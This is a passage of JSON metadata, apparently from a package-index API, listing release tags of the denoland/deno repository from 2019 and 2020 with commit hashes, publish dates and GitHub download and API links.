91a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2